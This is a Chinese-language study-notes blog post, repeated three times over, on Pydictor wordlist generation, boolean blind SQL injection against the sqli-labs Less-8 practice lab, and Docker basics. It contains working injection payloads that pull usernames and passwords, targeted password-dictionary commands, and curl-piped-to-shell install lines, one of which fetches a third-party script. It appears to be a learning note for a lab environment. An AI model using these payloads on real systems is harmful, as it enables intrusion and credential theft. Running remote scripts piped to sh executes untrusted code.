10.22docker容器相关

99封情书 提交于 2019-12-01 23:36:49

Pydictor使用

python pydictor.py -base d --len 4 4生成纯4位的数字密码

python pydictor.py -base L --len 1 4 -o name.txt生成14位的纯小写字母密码到name.txt

python pydictor.py -extend ex.txt --level 3 --len 3 5 根据扩展信息ex.txt来生成35位的密码(ex.txt是用户关于用户或者攻击对象的信息)

python pydictor.py -extend ex.txt --level 3 --len 3 5 --encode sha1 生成sha1加密的字典

python pydictor.py -sedb 接下输入手机过来的信息(set  ename  test),最后可以设置输出路径(output c:\result.txt),以及运行(run

 

盲注:用户提交的数据在后台数据库中执行之后,没有返回任何数据,无法字前端显示测试出的数据,需要使用盲注技术。

基于bool的盲注

基于时间的盲注

 

基于布尔的盲注:

Step1:探测输入点,’/  1’and 1=1%23  /1’ and ‘1’=’1.......

注意:用户提交的数据被带入到后台数据库中执行,根据页面显示效果判断此处是否存在注入点

Step2:收集数据库信息(当前用户名、当前数据库、版本、所有数据库等等)

http127.0.0.1/sqli-labs-master/Less-8/index.php?id=10’and length(user())=14%23

用户名长度是14

http127.0.0.1/sqli-labs-master/Less-8/index.php?id=10

Ascii(substr(user(),1,1))=114%23

用户名首字符是r,后续依次去判断

Security

Step3:查询当前数据库中的表

ascii(substr((select distinct table_name from information_schema.columns where table_schema=database() limit0,1),1,1))=114

最终找到有价值的表

Step4:获取执行表的字段名

Select distinct column_name from information_schema.columns where table_name=0x7573657

 

后续依次去判断第一个字段名、第二个字段名......

最后找出敏感的字段:usernamepassword

 

Step5:获取指定字段的数据

Select group_concat(username,0x7e,password)from users limit 0,1

http://127.0.0.1/sqli-labs-master/Less-8/index.php?id=10 and ascii(substr((select group_concat(username,0x7e,password)from users limit 0,1)1,1))=105%23

Step6:解密密文数据,登录后台

 

Docker入门以及漏洞环境搭建

docker :开源的应用程序容器引擎,使用Go语言开发,借助于docker打包的应用程序,将这些应用程序包含到这个容器里面.实现虚拟化,容器完全使用的是沙箱机制,相互独立,占用资源非常少

Docker 的三个概念:

镜像:imagedocker镜像是一个只读的模版,比如在镜像中包含完整的操作系统,在该操作系统中我们可以安装LAMP环境,镜像可以创建容器

容器:containerdocker利用容器运行程序,容器是镜像中创建运行的一个实例,容器可以运行、关闭、删除。

仓库:repository,集中放镜像的地方,每个仓库中包含了多个镜像,可以私有可以公开。最大的仓库是dockerhub

 

Docker的安装

Curl -s http://get.docker.com/ | sh apt install docker.io(在kali中安装docker首先要注意更换更新源,之后安装)

镜像加速器

Vim /etc/docker/daemon.json,替换成网上可用的加速器:

 

Pydictor使用

python pydictor.py -base d --len 4 4生成纯4位的数字密码

python pydictor.py -base L --len 1 4 -o name.txt生成14位的纯小写字母密码到name.txt

python pydictor.py -extend ex.txt --level 3 --len 3 5 根据扩展信息ex.txt来生成35位的密码(ex.txt是用户关于用户或者攻击对象的信息)

python pydictor.py -extend ex.txt --level 3 --len 3 5 --encode sha1 生成sha1加密的字典

python pydictor.py -sedb 接下输入手机过来的信息(set  ename  test),最后可以设置输出路径(output c:\result.txt),以及运行(run

 

盲注:用户提交的数据在后台数据库中执行之后,没有返回任何数据,无法字前端显示测试出的数据,需要使用盲注技术。

基于bool的盲注

基于时间的盲注

 

基于布尔的盲注:

Step1:探测输入点,’/  1’and 1=1%23  /1’ and ‘1’=’1.......

注意:用户提交的数据被带入到后台数据库中执行,根据页面显示效果判断此处是否存在注入点

Step2:收集数据库信息(当前用户名、当前数据库、版本、所有数据库等等)

http127.0.0.1/sqli-labs-master/Less-8/index.php?id=10’and length(user())=14%23

用户名长度是14

http127.0.0.1/sqli-labs-master/Less-8/index.php?id=10

Ascii(substr(user(),1,1))=114%23

用户名首字符是r,后续依次去判断

Security

Step3:查询当前数据库中的表

ascii(substr((select distinct table_name from information_schema.columns where table_schema=database() limit0,1),1,1))=114

最终找到有价值的表

Step4:获取执行表的字段名

Select distinct column_name from information_schema.columns where table_name=0x7573657

 

后续依次去判断第一个字段名、第二个字段名......

最后找出敏感的字段:usernamepassword

 

Step5:获取指定字段的数据

Select group_concat(username,0x7e,password)from users limit 0,1

http://127.0.0.1/sqli-labs-master/Less-8/index.php?id=10 and ascii(substr((select group_concat(username,0x7e,password)from users limit 0,1)1,1))=105%23

Step6:解密密文数据,登录后台

 

Docker入门以及漏洞环境搭建

docker :开源的应用程序容器引擎,使用Go语言开发,借助于docker打包的应用程序,将这些应用程序包含到这个容器里面.实现虚拟化,容器完全使用的是沙箱机制,相互独立,占用资源非常少

Docker 的三个概念:

镜像:imagedocker镜像是一个只读的模版,比如在镜像中包含完整的操作系统,在该操作系统中我们可以安装LAMP环境,镜像可以创建容器

容器:containerdocker利用容器运行程序,容器是镜像中创建运行的一个实例,容器可以运行、关闭、删除。

仓库:repository,集中放镜像的地方,每个仓库中包含了多个镜像,可以私有可以公开。最大的仓库是dockerhub

 

Docker的安装

Curl -s http://get.docker.com/ | sh apt install docker.io(在kali中安装docker首先要注意更换更新源,之后安装)

镜像加速器

Vim /etc/docker/daemon.json,替换成网上可用的加速器:

 

Pydictor使用

python pydictor.py -base d --len 4 4生成纯4位的数字密码

python pydictor.py -base L --len 1 4 -o name.txt生成14位的纯小写字母密码到name.txt

python pydictor.py -extend ex.txt --level 3 --len 3 5 根据扩展信息ex.txt来生成35位的密码(ex.txt是用户关于用户或者攻击对象的信息)

python pydictor.py -extend ex.txt --level 3 --len 3 5 --encode sha1 生成sha1加密的字典

python pydictor.py -sedb 接下输入手机过来的信息(set  ename  test),最后可以设置输出路径(output c:\result.txt),以及运行(run

 

盲注:用户提交的数据在后台数据库中执行之后,没有返回任何数据,无法字前端显示测试出的数据,需要使用盲注技术。

基于bool的盲注

基于时间的盲注

 

基于布尔的盲注:

Step1:探测输入点,’/  1’and 1=1%23  /1’ and ‘1’=’1.......

注意:用户提交的数据被带入到后台数据库中执行,根据页面显示效果判断此处是否存在注入点

Step2:收集数据库信息(当前用户名、当前数据库、版本、所有数据库等等)

http127.0.0.1/sqli-labs-master/Less-8/index.php?id=10’and length(user())=14%23

用户名长度是14

http127.0.0.1/sqli-labs-master/Less-8/index.php?id=10

Ascii(substr(user(),1,1))=114%23

用户名首字符是r,后续依次去判断

Security

Step3:查询当前数据库中的表

ascii(substr((select distinct table_name from information_schema.columns where table_schema=database() limit0,1),1,1))=114

最终找到有价值的表

Step4:获取执行表的字段名

Select distinct column_name from information_schema.columns where table_name=0x7573657

 

后续依次去判断第一个字段名、第二个字段名......

最后找出敏感的字段:usernamepassword

 

Step5:获取指定字段的数据

Select group_concat(username,0x7e,password)from users limit 0,1

http://127.0.0.1/sqli-labs-master/Less-8/index.php?id=10 and ascii(substr((select group_concat(username,0x7e,password)from users limit 0,1)1,1))=105%23

Step6:解密密文数据,登录后台

 

Docker入门以及漏洞环境搭建

docker :开源的应用程序容器引擎,使用Go语言开发,借助于docker打包的应用程序,将这些应用程序包含到这个容器里面.实现虚拟化,容器完全使用的是沙箱机制,相互独立,占用资源非常少

Docker 的三个概念:

镜像:imagedocker镜像是一个只读的模版,比如在镜像中包含完整的操作系统,在该操作系统中我们可以安装LAMP环境,镜像可以创建容器

容器:containerdocker利用容器运行程序,容器是镜像中创建运行的一个实例,容器可以运行、关闭、删除。

仓库:repository,集中放镜像的地方,每个仓库中包含了多个镜像,可以私有可以公开。最大的仓库是dockerhub

 

Docker的安装

Curl -s http://get.docker.com/ | sh apt install docker.io(在kali中安装docker首先要注意更换更新源,之后安装)

镜像加速器

Vim /etc/docker/daemon.json,替换成网上可用的加速器:

 

 

 

执行以下命令: curl -sSL http://oyh1cogl9.bkt.clouddn.com/setmirror.sh | sh -s <镜像加速地址>,将镜像加速地址加入到你的Docker配置文件/etc/docker/daemon.json中。适用于Ubuntu / Debian / CentOS

镜像

Docker search mysql查找镜像

Docker pull 镜像名称  下载

Docker images 查看本地已经下载好的镜像

Docker rmi 镜像的ID  删除镜像

容器

Docker run -d -p 8080:80 --rm --name 容器名 镜像id   运行容器

-d后台运行

-p后跟端口 port1:port2 将容器内部服务端口port2映射到本地端口port1(如果-p后什么也没有,随机分配端口)

--rm 容器停止后会自动删除

--name 容器运行起来之后赋予的名称

Docker ps 查看运行的docker

Docker ps -a 查看所有容器的状态

Docker stop 容器名/容器id  关闭容器

Docker start 容器名/容器id   开启容器

Docker rm 容器名/容器id   删除容器

 

进入容器内部

Docker exec -it 容器id /bin/bash

-it表示交互模式

导出

 

 

 

易学教程内所有资源均来自网络或用户发布的内容,如有违反法律规定的内容欢迎反馈
该文章没有解决你所遇到的问题?点击提问,说说你的问题,让更多的人一起探讨吧!